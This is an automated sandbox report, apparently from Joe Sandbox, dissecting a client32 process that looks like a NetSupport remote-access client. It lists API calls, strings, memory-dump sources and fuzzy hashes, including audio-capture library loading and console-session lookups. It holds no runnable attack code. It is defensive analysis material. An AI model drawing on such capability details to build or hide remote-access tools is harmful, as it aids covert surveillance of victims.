                                                                                                                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001056
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2830328467
                                                                                                                                                                                                    • Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 906220102-2830328467
                                                                                                                                                                                                    • Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D086
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2663631564-2830328467
                                                                                                                                                                                                    • Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WTSGetActiveConsoleSessionId), ref: 11035741
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11035757
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WTSGetActiveConsoleSessionId, xrefs: 1103573B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: WTSGetActiveConsoleSessionId
                                                                                                                                                                                                    • API String ID: 199729137-985505475
                                                                                                                                                                                                    • Opcode ID: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
                                                                                                                                                                                                    • Instruction ID: dfe2ba98866f40b925ff5ae74b5290a810f1b4d05858a75e8431e5ab4ea7c49c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74E0C231D12A308FC7219F6CF848789B7E4EF45B32F014A5AEAB593284C731A8818B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1604732272-2830328467
                                                                                                                                                                                                    • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    • Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(1100D73E,?), ref: 1100D4C9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D4D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoadVersion
                                                                                                                                                                                                    • String ID: AudioCapture.dll
                                                                                                                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,11049246), ref: 11131446
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11131433
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113142E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 689CDAE4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                    • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                                                                                                                    • API String ID: 4201588131-2118820724
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(00000000), ref: 1101D064
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1101D053
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1590435379-2830328467
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MenuProp
                                                                                                                                                                                                    • String ID: OldMenu
                                                                                                                                                                                                    • API String ID: 601939786-3235417843
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111E8DEC,00000000,?,?,1100C15B,00000000,00000000), ref: 1100D79F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC,?,?,1100C15B,00000000,00000000), ref: 1100D810
                                                                                                                                                                                                      • Part of subcall function 1100D700: EnterCriticalSection.KERNEL32(111E8DEC,?,?,1100B4CC,?), ref: 1100D709
                                                                                                                                                                                                      • Part of subcall function 1100D700: LeaveCriticalSection.KERNEL32(111E8DEC,?,1100B4CC,?), ref: 1100D781
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7DF
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7FB
                                                                                                                                                                                                      • Part of subcall function 1100D6B0: EnterCriticalSection.KERNEL32(111E8DEC,1100C3EB), ref: 1100D6B5
                                                                                                                                                                                                      • Part of subcall function 1100D6B0: LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D6EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2978645861-0